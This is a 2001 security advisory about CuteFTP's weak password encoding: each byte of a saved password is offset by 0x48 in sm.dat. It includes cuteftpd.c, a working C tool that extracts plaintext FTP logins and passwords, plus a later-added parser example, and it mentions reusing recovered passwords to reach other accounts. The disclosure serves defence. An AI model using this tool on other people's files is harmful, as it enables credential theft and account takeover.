scx-sa-21.txt
Posted Aug 3, 2001
Authored by Incubus | Site securax.org

Securax Security Advisory #21 - Globalscape's CuteFTP, a popular FTP client, uses a weak encryption scheme, allowing plaintext login and password recovery from the address book. Includes cuteftpd.c which calculates the plaintext.

tags | exploit
SHA-256 | 2499dd93058956bab1a6f07a873e2dc6e7a2668ba0e1e125af0103445bbc88e9

============================================================================
Securax-SA-21 Security Advisory
belgian.networking.security Dutch
============================================================================
Topic: CuteFTP uses a weak password encoding scheme
Announced: 2001-08-01
Affects: CuteFTP 4.2.4 and below. (but not too low)
============================================================================

Note: If you happen to find more information, solutions, ... about the below
problem or further variants please contact me on the following email
incubus@securax.org, or you can contact the Securax crew by e-mail at
info@securax.org.

I. Problem Description
-----------------------

Globalscape's CuteFTP is a popular FTP client. It is used to connect to
remote ftp servers. CuteFTP has a kinda "Address book" which stores info on
several FTP servers, such as hostname, login & password (basically the stuff
you need to log in.. :)).

In any case, CuteFTP uses a very weak encryption scheme: it adds 72 (hex 48)
to each byte of the plaintext password. So, Globalscape uses a kinda ROT-72
encryption scheme.

Let's get down and dirty, technical that is.. How are the passwords stored?
Well, they are stored in a file called "sm.dat". I'll give you an example:

This is a part of the hex dump of my sm.dat:

08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9
^                          ^                 ^
|  - hostname (10.0.0.3) - |    - login -    |  - encoded pw -
|                          |                 |
|___ len(hostname)         |__ len(login)    |__ len(password)

The password is BC AD BB BB A9, but if you subtract hex 48 from each byte,
you'll see: 74 65 73 73 61, which is "tessa".

So you probably can see, there is a user "Admin", with a password ("tessa")
on box 10.0.0.3.

Cute(ftp) isn't it?
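
An added example (not part of the original advisory or of cuteftpd.c): a bounds-checked parser for the three length-prefixed fields shown in the dump above, run on the advisory's own 21 bytes. The names sm_entry, read_field and parse_entry are hypothetical, and treating the three fields as one contiguous entry is an assumption based only on that excerpt.

```c
#include <stdio.h>
#include <string.h>

#define CUTEFTP_OFFSET 0x48  /* constant the advisory says is added to each password byte */

struct sm_entry { char host[256], login[256], password[256]; };  /* hypothetical layout */

/* Copy one length-prefixed field from buf[*pos..] into out (NUL-terminated),
 * subtracting `offset` from every byte. Returns 0 on success, -1 if the
 * length byte claims more data than the buffer holds. */
static int read_field(const unsigned char *buf, size_t len, size_t *pos,
                      char *out, unsigned char offset)
{
    if (*pos >= len) return -1;
    size_t n = buf[(*pos)++];            /* one-byte length, so n <= 255 */
    if (n > len - *pos) return -1;       /* reject truncated or lying lengths */
    for (size_t i = 0; i < n; i++)
        out[i] = (char)(unsigned char)(buf[*pos + i] - offset);
    out[n] = '\0';
    *pos += n;
    return 0;
}

/* Parse hostname, login and encoded password, in the order shown in the dump. */
int parse_entry(const unsigned char *buf, size_t len, struct sm_entry *e)
{
    size_t pos = 0;
    if (read_field(buf, len, &pos, e->host, 0)) return -1;
    if (read_field(buf, len, &pos, e->login, 0)) return -1;
    return read_field(buf, len, &pos, e->password, CUTEFTP_OFFSET);
}

/* The 21 bytes printed in the advisory's hex dump, copied as they appear there. */
static const unsigned char ADVISORY_DUMP[] = {
    0x08, 0x31, 0x30, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x33,
    0x05, 0x41, 0x64, 0x6D, 0x6D, 0x69,
    0x05, 0xBC, 0xAD, 0xBB, 0xBB, 0xA9
};

int main(void)
{
    struct sm_entry e;
    if (parse_entry(ADVISORY_DUMP, sizeof ADVISORY_DUMP, &e) != 0) return 1;
    /* report that a password is recoverable without echoing it */
    printf("host=%s login=%s recoverable password of %zu chars\n",
           e.host, e.login, strlen(e.password));
    return 0;
}
```

The transform takes no key, so read access to sm.dat is all that stands between a reader and the stored password.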


II. Impact
----------

No, you won't be able to r3wt th3 pl4n3t with this, but it gave me access to
several other accounts, because ftp and shell passwords are often the same.

But instead of letting you calculate the password.. here's the code:

--| BOF: cuteftpd.c |--

/*

CuteFTPd: a CUTE Fucking Too easy Password Decrypter
----------------------------------------------------

This code was made on a hot and sunny afternoon, (as we got many of em in
belgium). So, don't shoot me if some things won't work. I've found some
problems when your login is 11 (0x0A) or 13 (0x0D) chars long... but what
the hell.. fix it.

This program is dedicated to Peter "DC" De Coninck, a good friend of mine
who passed away in April. DC, I miss you, thank you for everything, take
care man.

All my love to Tessa, I love you forever, always, every day of my life,
please marry me. I love you, i need you. please, be mine forever.

Respect to all the great ppl at #securax@irc.hexyn.be: U know who i mean,
and who i don't mean. grmBL. ;)

To Reggie: happy birthday!! =)

Take care,
incubus <incubus@securax.org>

ps: this code sucks, i know.

*/


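#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define banner "\n-] CuteFTP password retrieval tool\n -------------------------------\n\n"
#define usage " usage: %s <path_to_sm.dat>\n\n"

int main(int argc, char **argv)
{
    FILE *list;
    int c, p, t;   /* int, not unsigned char, so EOF is distinguishable from 0xFF */
    /* every length is one byte (max 255), so 256 bytes always leaves room for the NUL */
    unsigned char host[256], un[256], ep[256], dp[256];
    int i;

    printf(banner);
    if (argc < 2) { printf(usage, argv[0]); exit(1); }
    if ((list = fopen(argv[1], "rb")) == NULL) {
        perror("error opening file"); exit(1);
    }

    /* test the result of fgetc() rather than feof(), which only turns true after a failed read */
    while ((c = fgetc(list)) != EOF) {
        memset(host, 0x0, sizeof host);     /* clear before use, not only after */
        if (c < 48) {                       /* candidate hostname length byte */
            p = fgetc(list);
            if (p != EOF && isalnum(p)) {   /* hostnames start with a letter or digit */
                host[0] = p;
                for (i = 1; i < c; i++) {
                    if ((t = fgetc(list)) == EOF) break;
                    if (t != 13)
                        if (!((t < 48) &&
                              (!isspace(t)) &&
                              (t != '.') && (t != '-') &&
                              (t != '_'))) host[i] = t;
                }
                if (strchr((char *)host, '.')) {   /* only report what looks like a host */
                    printf("-] %s\n---] login:", host);
                    p = fgetc(list);               /* login length */
                    if (p == EOF) break;
                    if (p == 0) printf("anonymous\n\n");
                    else {
                        /* the length byte is not part of the login; copying it into
                           un[0] printed it as a control character (a newline or
                           carriage return for lengths 0x0A and 0x0D) */
                        memset(un, 0x0, sizeof un);
                        for (i = 0; i < p; i++) {
                            if ((t = fgetc(list)) == EOF) break;
                            un[i] = t;
                        }
                        printf("%s\n password: ", un);
                        p = fgetc(list);           /* password length */
                        if (p == EOF) p = 0;
                        memset(ep, 0x0, sizeof ep); memset(dp, 0x0, sizeof dp);
                        for (i = 0; i < p; i++) {
                            if ((t = fgetc(list)) == EOF) break;
                            ep[i] = t;
                        }
                        for (i = 0; i < p; i++) {
                            if (ep[i] != 0x0) {
                                dp[i] = ep[i] - 72;   /* undo the +72 (0x48) encoding */
                                printf("%c", dp[i]);
                            }
                        }
                        printf("\n hex: ");
                        for (i = 0; i < p; i++)
                            if (dp[i] != 0x0) printf("0x%02x ", dp[i]);
                        printf("\n\n");
                    }
                }
            }
        }
    }
    fclose(list);
    putchar(10);
    return 0;
}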

--| EOF |--


III. Workarounds
----------------

There's this nasty option which allows you to encrypt your sm.dat file, but
let's take a look at that and see where and how that password is stored.. =)

Other workarounds: don't save passwords in cuteftp, but remember 'em, or use
another ftp client, OS, ...


IV. Credits
-----------
All my love to Tessa.
Respect: f0bic, F_F, r-dude, t-omicr0n, tosh, senti, zym0, vor, cic, primus,
virtual, necro, ares, ... and so on, you know who you are.

take care,

-- incubus (incubus@securax.org).

============================================================================
For more information incubus@securax.org
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
----------------------------------------------------------------------------